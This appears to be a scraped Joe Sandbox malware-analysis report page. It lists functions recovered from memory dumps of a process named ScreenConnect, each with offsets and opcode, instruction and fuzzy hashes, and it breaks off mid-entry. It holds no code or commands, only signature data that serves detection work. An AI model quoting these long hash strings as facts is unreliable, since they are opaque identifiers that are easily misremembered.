Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 121480a23b8ddf688e0f7296467aa786f79b598202b6ba64893a043985491e83
Instruction ID: 8ca192c234e2bfd45bf91d20d2c2d3a52d94c4f44a8ae77bf589926195fdcbbf
Opcode Fuzzy Hash: 121480a23b8ddf688e0f7296467aa786f79b598202b6ba64893a043985491e83
Instruction Fuzzy Hash: A111E5B1E40204EFEB15CE69C8406EBBBB6AFC6300F14C4B6DA54DB155E371DA02CB92

Function 01B7D683 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998353787.0000000001B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1b7d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 0a40f921fd3f43c3f9b64f70bcc5c2a7390d617d0515ad21b46795515aab65fe
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 1C11AC76504280CFDB16CF54D9C4B16FF72FB94324F24C6A9D9090B256C33AD45ACBA2

Function 01CBFA80 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c49c51c919e6c9fc63f993d1527227de39deb85cd57aaa8f67562f57581eaf5
Instruction ID: d6f7f59ce73ab40558cba70a2b668d92d70212bf63f342ddc8f3ba9c1fc708f9
Opcode Fuzzy Hash: 7c49c51c919e6c9fc63f993d1527227de39deb85cd57aaa8f67562f57581eaf5
Instruction Fuzzy Hash: 79018F763400108B8748DA6DF89496EB3EAFBC8624314843FE609C7351CB32EC138768

Function 01CB91B8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ce151261dcac1a7cfa062a117b6ffd889516b0447681283977ac43875e1cfd
Instruction ID: c1ce1bbb6ecb9498f9abcfb890c843f49d2d696e5de00d7ee36d770eedea8a8f
Opcode Fuzzy Hash: 31ce151261dcac1a7cfa062a117b6ffd889516b0447681283977ac43875e1cfd
Instruction Fuzzy Hash: 51118EB1E40205AFDB14CA6DC840AEBB7FAAFC5300F14C466E654D7254E772DA01CB92

Function 01CBCBC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a8f6adf7ea9cc3eb30393802003834321a3734595319bb7085dccbcf6a997b8
Instruction ID: e92272ab6d7e68517cc2d77dd5bc65ec3e6db2a675383fa1ef6d0d79763c0531
Opcode Fuzzy Hash: 4a8f6adf7ea9cc3eb30393802003834321a3734595319bb7085dccbcf6a997b8
Instruction Fuzzy Hash: 0211D631A4021DDFDF14DBA8D9646EDBBB1AF89310F000469E006BB2B4DB785D44CBA4

Function 01CB8B95 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83964452e1545352634d6accc725ee43313d530dae000cad8bc46d0a8f14dad
Instruction ID: 926c02e7d77374afbecee84b169813f35ed1ed9a0a6b9b955a28c26a04e3f987
Opcode Fuzzy Hash: d83964452e1545352634d6accc725ee43313d530dae000cad8bc46d0a8f14dad
Instruction Fuzzy Hash: 9811347190005ADBCF05DFACD9808ECBBBAFF85304F58C594E005AB569C735E986CB60

Function 01CBCBB0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc42db5dedef4263e7b69bb10c65d9e8e94014bbe66a30fd844d018ad3113f80
Instruction ID: 0d6aaf2c033fc42ccb11ea727b7cc88e525927e798a414df239b110de2e84354
Opcode Fuzzy Hash: bc42db5dedef4263e7b69bb10c65d9e8e94014bbe66a30fd844d018ad3113f80
Instruction Fuzzy Hash: D7113C70A402189FDF14DBA8C9956EDBBB1EF88310F105429E002BB2A4DA7C5D42CBA5

Function 01CB8B30 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f5b4fa8cd041e8450f9202387685cc9ef6ade3101cd80dc71b8af5b0bce24d
Instruction ID: 7e916b4d145dc93a7df24875da72f6df6343ceb68687ed5ebf4bafbefedb4f45
Opcode Fuzzy Hash: 30f5b4fa8cd041e8450f9202387685cc9ef6ade3101cd80dc71b8af5b0bce24d
Instruction Fuzzy Hash: E3016D71901119EBDF04DFA9D8444DDBBB5EF89314F049466E505B7250D730A906CB90

Function 01CB8AB0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15336ea66ae02b87d6e5d163bcc4f95be7616e42d0481c755848196196a0a9c6
Instruction ID: 90c29b4a84ac75bd614a13419bcbd7f57a48116fcf6e72b0416a6d954633b68e
Opcode Fuzzy Hash: 15336ea66ae02b87d6e5d163bcc4f95be7616e42d0481c755848196196a0a9c6
Instruction Fuzzy Hash: 7511303590010A9FCF01DFA8C9409DEBBF5FF49304B108569E904BB261D771AA0ACF90

Function 01B7D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998353787.0000000001B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1b7d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac2de92bb5bd3674f3b549c31f3587168a2be6867729e61885d721976f7202b8
Instruction ID: 60a4ce27aadb8e6117d214134d6e02d64ed0cd4d33cfec97f138e70381019a0f
Opcode Fuzzy Hash: ac2de92bb5bd3674f3b549c31f3587168a2be6867729e61885d721976f7202b8
Instruction Fuzzy Hash: 0D01696140D3809FE7174B2588A4752BFA8EF57264F0984DBE9988F2A3C2695845C772

Function 01CBA9C8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f593e03c1cafd25d18d66f9757725f2997d4f7ae07c95a5fdd92bcfa6b7b415d
Instruction ID: 26946524a0fd97032f1ccf21ddfb5e314aa1554dff68104b827c386af505d01f
Opcode Fuzzy Hash: f593e03c1cafd25d18d66f9757725f2997d4f7ae07c95a5fdd92bcfa6b7b415d
Instruction Fuzzy Hash: BD014931F002219B8F198A5DE8500ABB7EDFBC8260714497BD105DB311DFB1ED028BC0

Function 01B7D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998353787.0000000001B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1b7d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79c9cd14050fab068bc7da0d0b44ed33e9f96814c72bc6eb31861184bd1d6fe
Instruction ID: fb4d4619c946d33d06fb83251c49545a7e4b7943007c484042a064fb3f11b959
Opcode Fuzzy Hash: f79c9cd14050fab068bc7da0d0b44ed33e9f96814c72bc6eb31861184bd1d6fe
Instruction Fuzzy Hash: 60012B31108300AAE7164B69CD94767BFD8EF493E4F08C5AAED690B186C379D841C6B1

Function 01CB8B40 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c66a8a9de23cf6a726b7b43e6e95ecfca81b946476ddbfefed678995561aee
Instruction ID: 897a978cce3fdab26ebb990fcd5638dbb9884c03c1ecbde3e1a3cf6f6aea9815
Opcode Fuzzy Hash: 59c66a8a9de23cf6a726b7b43e6e95ecfca81b946476ddbfefed678995561aee
Instruction Fuzzy Hash: AA012C31D0015ADBCF04DFA9D9448DDBBBAEF89314F0584A6E505B7264DB306946CB90

Function 01CBE260 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df55478ae5a316b6eaaa0b549904c5e96caffbbae213cb74b7973236726eb6e9
Instruction ID: 8ee884a6aa57fbba2022b0a5225b5501398d7cba0259f13b362d0dc2c4e13fc7
Opcode Fuzzy Hash: df55478ae5a316b6eaaa0b549904c5e96caffbbae213cb74b7973236726eb6e9
Instruction Fuzzy Hash: 75F0A971D401199FCB41DFADD8815DDBBF1EF88210B25C165E859E7611E7399A13CB80

Function 01CB329C Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ca505a01f4c866c1970589eec8c5c864ac8713867ca8621d75756614674790
Instruction ID: b4befefea87de05dd6bec2c297945814c50a855c494fb8b76de55389106ce08e
Opcode Fuzzy Hash: 08ca505a01f4c866c1970589eec8c5c864ac8713867ca8621d75756614674790
Instruction Fuzzy Hash: 96F04CA280D2C08FD713872968912DD7FE0FA92240B4915DBD0C1CF367E648EA4B93A2

Function 01CBBCC8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56267c8b69dba1af3d3ec82b7a6e8e91a6f0b26dae7ee12c1f82ac7a877d4cb5
Instruction ID: 892e2c1318b8d464d6c1afea302e9b97d70e1623b3e0130f67fdf9542ba02208
Opcode Fuzzy Hash: 56267c8b69dba1af3d3ec82b7a6e8e91a6f0b26dae7ee12c1f82ac7a877d4cb5
Instruction Fuzzy Hash: 73F05836B092149ADB28CEBEA40069BBBDACBC4624B14807FE58DC3640E831E8018765

Function 01CB0E20 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a872fb05d7d63788cd3456a32f811b123b9d118273ec33d884e7a49c0cd5811
Instruction ID: 6b76f0e9e09686b7ad223dfffc5bd8a2d9169ca25d782b7536d4ad8128043e8a
Opcode Fuzzy Hash: 3a872fb05d7d63788cd3456a32f811b123b9d118273ec33d884e7a49c0cd5811
Instruction Fuzzy Hash: EFF024736442009BC70A7779A8410EE7BA1EED661574484FFE10ACB295DF22CC06C790

Function 01CB31E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d3192d56d46fae03bf38b09250cf655c4ee377e4f2a077defd34df3ad82155d
Instruction ID: b8243ec425780d39d9ecc58a062a0071e855406fd37cdd9292d47cfc3e77ce21
Opcode Fuzzy Hash: 6d3192d56d46fae03bf38b09250cf655c4ee377e4f2a077defd34df3ad82155d
Instruction Fuzzy Hash: 73F019B4805288EFDF41EBA5D5852DDBFF0EB05200F2460A9C515AB251D734AA45DB52

Function 01CBF640 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84c3790b9f98f88f7dbc2cc63518b38e3dd43e4d267e78de9dcdce99db92179
Instruction ID: 6109ce0dfdecc3f0ac2e2585848fea9a77fe5ae7a8c24433c7fa46fbded814d3
Opcode Fuzzy Hash: f84c3790b9f98f88f7dbc2cc63518b38e3dd43e4d267e78de9dcdce99db92179
Instruction Fuzzy Hash: 80F089363002197F9F055E989C509EF3BABEBC8360B04442AF619D3360DB31DD1197A5

Function 01CBFA08 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5555eb1a21373dbdc02624d14fc96a36fe20ec0013ffae34ed6218c525660b4
Instruction ID: ff39155eb86e8402b04c66bdf15e9c3fea0a7f2c2b57bd1ef0b9ec35294fd65c
Opcode Fuzzy Hash: e5555eb1a21373dbdc02624d14fc96a36fe20ec0013ffae34ed6218c525660b4
Instruction Fuzzy Hash: E5F08271740241DB8656966EEC9099BBBDAEBC8A50304846BE219C7320DF60FD054794

Function 01CBAA48 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db72b86fc624494d8a862f9dc5fb2b0dc9bbd2989a2ec95cd4ceae488bb9f16a
Instruction ID: feab9a10c441abb4607d2030ec0925017b71235b963a6994b70e698f91e62a12
Opcode Fuzzy Hash: db72b86fc624494d8a862f9dc5fb2b0dc9bbd2989a2ec95cd4ceae488bb9f16a
Instruction Fuzzy Hash: 2FF055313002404BDB141E9A74C80AA7FE6FBC8960714017EE20EC7392CE688C078350

Function 01CB31F0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eddaa10854fcac99af6375b03db5b1e736fb06e5c9983e1ae00ac098f33e1575
Instruction ID: b58f05bbdbfc1c0e2caa8f65aee5610624c01b92b9a1365c1d884fcbb9fcfae9
Opcode Fuzzy Hash: eddaa10854fcac99af6375b03db5b1e736fb06e5c9983e1ae00ac098f33e1575
Instruction Fuzzy Hash: D3F04474E0124CEFDF04EFA9D5846ACBBF1FB04240F2060A8C605AB290DB30AF84CB42

Function 01CB714A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f0e3d7dbd8c8ecc3e71beeb3b5b63b83d894ad3ae425c3ca31bb5a416b2d8ae
Instruction ID: 4c550de2310dae1788d99ab2d40601e0285891ecea9f2c5cef45663eeca9a713
Opcode Fuzzy Hash: 6f0e3d7dbd8c8ecc3e71beeb3b5b63b83d894ad3ae425c3ca31bb5a416b2d8ae
Instruction Fuzzy Hash: 62E0AB36A05310DFA7129B6978001E9B7E4D9C513870410BBD509CB381D530EE1743C1

Function 01CB5920 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b56638e21c7db14cc152ad3788743991af750360f5af62ab3e42e12435273be
Instruction ID: f4f992e391f5e72edd8f94098199d2251c67ad57f564ce6edd2f90fe4bdb07e1
Opcode Fuzzy Hash: 0b56638e21c7db14cc152ad3788743991af750360f5af62ab3e42e12435273be
Instruction Fuzzy Hash: 6AF020323063506BC7225B39A40806EBFAAEBCE26070560AAE106CB3C1CF24EC03D390

Function 01CBBCBA Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2556077b5379b6a2ae90f4843f232c16c7d9f3e3fb8a0cad2519a16dff7153b5
Instruction ID: 0aa0358ae08b822f846491cb347d38d455121e2023faa62425f673aebdc377a8
Opcode Fuzzy Hash: 2556077b5379b6a2ae90f4843f232c16c7d9f3e3fb8a0cad2519a16dff7153b5
Instruction Fuzzy Hash: C5F0A072A0D3815FC725CF7A980458BBFD99F85224B09C2BFE09DC3582E924C502C322

Function 01CBE2AA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19dd1ed4b9d6c0335955e2c1e39120fdac87fea3206833a8911127fb79e7e2a4
Instruction ID: 54e36c888164572ea9aac8de0c49b36379e6c37c7b1dbd75d54870bb693c0bb9
Opcode Fuzzy Hash: 19dd1ed4b9d6c0335955e2c1e39120fdac87fea3206833a8911127fb79e7e2a4
Instruction Fuzzy Hash: 52F03A30B00118CFDB15DF6DC554AAABBE1EF88750B048069E805CB368DB35DE01CB81

Function 01CBEBA0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b78bc6d7bba4aa27a4cad2e9b7d251f2b99b481f4065f785c6a969c68e61e6
Instruction ID: d59b4716a290f805273632fa3d560436daf6d2aba504124246332798aa31258a
Opcode Fuzzy Hash: d8b78bc6d7bba4aa27a4cad2e9b7d251f2b99b481f4065f785c6a969c68e61e6
Instruction Fuzzy Hash: 20E06536704119AF8B04CA4ED440DDBBBAADFD9660B14C067F809C7315DA35DD1187A4

Function 01CB52E8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db9a1f205f3996ccdee62101010eb722f909dae2ce9bdd5984c7fa7a29af6db4
Instruction ID: c8b62b9718a0c742b3518b9bc5bf1817f5cc0605860b52c2ff063d052ac06a91
Opcode Fuzzy Hash: db9a1f205f3996ccdee62101010eb722f909dae2ce9bdd5984c7fa7a29af6db4
Instruction Fuzzy Hash: F0E02272E083006BEF09A6A884501DEBFF0AF4B210F0800ABD00ED7251D825DA069350

Function 01CBE270 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb6716dce53458fda20cf79c7d0b08c020156babfb9e3dcfe2015caa58e7ae2
Instruction ID: 5052c8e21ce3697df63aead067301cd7f7b551295c6e6223c6bd8f9ad1833ee6
Opcode Fuzzy Hash: 4bb6716dce53458fda20cf79c7d0b08c020156babfb9e3dcfe2015caa58e7ae2
Instruction Fuzzy Hash: 8DF0B271E00219DF8B40DFADC8416DEFBF5EF49200B24806AD918E7211E331AA12CBC0

Function 01CBAA58 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b883afd948357a431e9e46d9a18e98b81f962e0b2a31dd375e897c5f064c913d
Instruction ID: c6c5012952860e4423b3c0102c1fddc1a9d550c9a50ef5e2c2e57e3b04b86d2a
Opcode Fuzzy Hash: b883afd948357a431e9e46d9a18e98b81f962e0b2a31dd375e897c5f064c913d
Instruction Fuzzy Hash: D1E0DF313002109BAA182A9B748852EBADAFBC8AA1B54013DE20AD3390CEB5CC0587A4

Function 01CBDF09 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e283919dbdb8d2e130c3fe9f346f0ce0ee73965f3770120e7f36bee2d1777e
Instruction ID: 466b53334b9f0097292852493a7586dc9460e596e906994fe16050faa63a8ec4
Opcode Fuzzy Hash: f0e283919dbdb8d2e130c3fe9f346f0ce0ee73965f3770120e7f36bee2d1777e
Instruction Fuzzy Hash: D8E022B48482858FDF01EB64E8804ECBB30FB0631DB1146CBE829C2116EB245D03CB62

Function 01CB0E30 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b66681176e83cae6fd636b099977ea23d75ad90b342820ebc855bdf389f46474
Instruction ID: c09014391793a549ed7935510a2b4d8b260f8b4640761814b221f4f297896c4b
Opcode Fuzzy Hash: b66681176e83cae6fd636b099977ea23d75ad90b342820ebc855bdf389f46474
Instruction Fuzzy Hash: FAE092332001005B86097779A5044DE76D5EAC561571484BAD11ACB355DF62DC06C7D0

Function 01CBF950 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a55c9f84d813a33522e5e17237d7fc15d4c1cfd368288cda70912e6bbd8cfc
Instruction ID: d598d217cc5d5f481ba5b862984b97148e6eb072e637cecdd244900068f6779e
Opcode Fuzzy Hash: 37a55c9f84d813a33522e5e17237d7fc15d4c1cfd368288cda70912e6bbd8cfc
Instruction Fuzzy Hash: D0E07D327012059BC318951AE840957B3EEEBC8724F20047DD20DC7311CD72DC83C390

Function 01CB3257 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeaeea49c8f4440392f902a803b4a123698e6b77e7eafd7d2d3624ead1ce0ffc
Instruction ID: d999d9a87b64da8067a9c4260e4172f55a27ba8a85657b599b9d2daf7c45289b
Opcode Fuzzy Hash: aeaeea49c8f4440392f902a803b4a123698e6b77e7eafd7d2d3624ead1ce0ffc
Instruction Fuzzy Hash: 52E0922220A2850FC726D768F8902DD7FE1AA92210B0809EED4C19B257DB64AA4A8391

Function 01CB5979 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee079898d6db4e25e9ac456d7c8be28ca1eabbd7c2084dc049239a7099c1ba8
Instruction ID: b22a4e46539c72fbdedadd140e0b3d57c105475834ea6c7ab61c4dcf0773cbc3
Opcode Fuzzy Hash: 8ee079898d6db4e25e9ac456d7c8be28ca1eabbd7c2084dc049239a7099c1ba8
Instruction Fuzzy Hash: 9BE09271905284BFDB45DB74981069E7FB0AA07204B1151EAD805D72D1D6319E05D700

Function 01CB5930 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b47f54b3f281f20f4c3e492e422dd1c6497a92ae10596c58a3378e80e9844d7
Instruction ID: 4381de28bfcaaa4b94e3b839218dd59f71c1d3965ee8613eba214c571ecf4e4b
Opcode Fuzzy Hash: 3b47f54b3f281f20f4c3e492e422dd1c6497a92ae10596c58a3378e80e9844d7
Instruction Fuzzy Hash: FDE04636302214AB8724667AA40887E7AAEEBDD2617145126E51AC73C0CF34AC028BA0

Function 01CBBC82 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 612122ad22c942e13b41af4fdcf5ab925b72c2b6f98aa18655a7f7ee76005a1a
Instruction ID: dc0d595f0d8ce55c0e898b89613036c35ee817cc93aeb32bf4cba5790c1582ac
